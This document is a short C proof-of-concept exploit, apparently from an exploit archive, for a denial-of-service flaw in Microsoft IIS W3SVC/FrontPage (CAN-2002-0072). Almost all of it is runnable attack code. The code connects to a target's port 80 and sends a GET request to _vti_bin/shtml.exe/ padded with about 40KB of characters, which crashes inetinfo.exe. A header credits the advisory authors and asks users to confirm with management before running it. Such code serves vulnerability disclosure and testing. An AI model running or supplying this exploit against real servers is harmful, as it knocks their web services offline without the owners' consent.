Microsoft IIS W3SVC Denial of Service - Brings down the inetinfo.exe process, crashing IIS.
81814de9d2e596727cfc98782533c7d68dd2b7ae0b565762aba72a987fd5e7bd
/* iisfux0r.c - Microsoft IIS W3SVC Denial of Service, (c) Filip Maertens - PoC
BUG-ID : 2002009
CVE : CAN-2002-0072
Advisory : Peter Grundle @ KPMG
Dave Aitel @ AtStake
** This will bring down the Inetinfo.exe process, in which you create a Denial of Service
condition on your webserver. Please, confirm with management prior to executing this
proof of concept code. The author of this code, nor Peter Grundle and Dave Aitel can
be helt responsible for disclosing this vulnerability.
** Example usage: RH-BOX# iisfux0r localhost /
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#define DENIALSIZE 40 * 1024
#define URLSEQUENCE "_vti_bin/shtml.exe/"
int main(int argc, char *argv[])
{
struct sockaddr_in sin;
char denialchar[DENIALSIZE + 100];
int i, create_socket;
printf("iisfux0r | Microsoft IIS W3SVC/FP2002 Denial of Service | <filip@securax.be>\n----------------------------------------------------------------------------\n");
if (argc < 3)
{
printf(" -- Usage: iisfux0r [ip] [directory]\n");
exit(0);
}
// Create the sockets
if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf(" -- Socket created.\n");
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = inet_addr(argv[1]);
if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf(" -- Connection made.\n");
else
{ printf(" -- No connection.\n"); exit(1); }
// Create the Denial of Service payload
printf(" -- Crafting payload.\n");
strcat(denialchar, "GET ");
strcat(denialchar, argv[2]);
strcat(denialchar, URLSEQUENCE);
for(i=0; i < DENIALSIZE; i++)
{
strcat(denialchar, "x");
}
strcat(denialchar, ".html");
strcat(denialchar, " HTTP/1.0\n\n");
send(create_socket, denialchar, sizeof(denialchar), 0);
close(create_socket);
}
// EOF - More exploits @ http://filip.compsec.be